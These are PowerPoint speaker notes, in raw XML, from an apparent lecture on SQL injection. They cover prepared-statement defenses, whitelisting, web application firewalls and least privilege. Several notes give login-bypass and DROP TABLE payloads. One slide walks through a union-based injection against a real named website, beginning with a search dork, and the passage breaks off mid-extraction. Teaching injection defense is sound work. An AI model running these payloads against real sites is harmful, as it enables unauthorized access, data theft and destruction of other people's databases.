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26"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId27"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="356" r:id="rId3"/>
    <p:sldId id="385" r:id="rId4"/>
    <p:sldId id="386" r:id="rId5"/>
    <p:sldId id="379" r:id="rId6"/>
    <p:sldId id="382" r:id="rId7"/>
    <p:sldId id="383" r:id="rId8"/>
    <p:sldId id="387" r:id="rId9"/>
    <p:sldId id="378" r:id="rId10"/>
    <p:sldId id="389" r:id="rId11"/>
    <p:sldId id="390" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="394" r:id="rId14"/>
    <p:sldId id="395" r:id="rId15"/>
    <p:sldId id="396" r:id="rId16"/>
    <p:sldId id="397" r:id="rId17"/>
    <p:sldId id="398" r:id="rId18"/>
    <p:sldId id="401" r:id="rId19"/>
    <p:sldId id="388" r:id="rId20"/>
    <p:sldId id="392" r:id="rId21"/>
    <p:sldId id="393" r:id="rId22"/>
    <p:sldId id="399" r:id="rId23"/>
    <p:sldId id="400" r:id="rId24"/>
    <p:sldId id="33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42" autoAdjust="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28/04/2015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dirty="0"/>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28/04/2015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dirty="0"/>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modsecurity.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isc.sans.org/diary.html?storyid=3823"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SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Injected SQL commands can alter SQL statement and compromise the security of a web application.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Open Web Application Security Project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OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="120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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134184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Opposite to a blacklist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Allows specified values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Good for radio button list, fixed dropdown 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For a free form fields =&gt; a bad idea</a:t>
            </a:r>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4290306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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2027748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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2164899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$conn = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($host, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>usernamehost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passwordhost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dbname</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 = $conn-&gt;prepare("SELECT * FROM user WHERE username = ? and password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integer; d - double; s - string; b - BLOB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bind_param</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ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>", $username,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-&gt;execute();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store_result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num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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"Login successfully";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else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"Wrong username/password";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-&gt;close();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$conn-&gt;close();</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359457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$conn = new PDO("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysql:host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hostname;dbname</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dbname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usernamehost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passwordhost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$conn-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);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prepare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and bind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 = $conn-&gt;prepare("SELECT * FROM user WHERE username = :username and password =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bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(':username', $username);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bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(':password',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-&gt;execute();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rowCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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"Login successfully";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else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"Wrong username/password";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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15259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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1492901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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001900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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4001004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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Comprehensive data sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. Web sites must filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> user input. Ideally, user data should be filtered for context. For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address, phone numbers should be filtered to allow only the characters allowed in a phone number, and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Use a web application firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. A popular example is the free, open source module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> which is available for Apache, Microsoft IIS, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> web servers. ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests. Its SQL injection defenses can catch most attempts to sneak SQL through web channels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Limit database privileges by context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. Create multiple database user accounts with the minimum levels of privilege for their usage environment. For example, the code behind a login page should query the database using an account limited only to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>relevent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> credentials table. This way, a breach through this channel cannot be leveraged to compromise the entire database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Avoid constructing SQL queries with user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1"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Even data sanitization routines can be flawed. Ideally, using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167241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0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login hacked: admin’ or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Login hacked: admin' or 1=1 LIMIT 1 – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> hacked: admin’ or 1=1; Drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> --  &lt;change a line of code if ($result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysqli_multi_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($conn, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1263682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Insufficient input validation and improper construction of SQL statements in web applications can expose them to SQL injection attacks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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3126630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0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login hacked: admin’ or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0"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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442560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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{35845946-0CF3-4C0F-AF5C-F563F65A0652}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2368136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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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http://www.raahauges.com/view-news.php?id=8</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2. http://www.raahauges.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view-news.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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3. http://www.raahauges.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>view-news.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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4. http://www.raahauges.com/view-news.php?id=8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"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5. http://www.raahauges.com/view-news.php?id=null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> union all select 1,2,3,4,5 --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baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
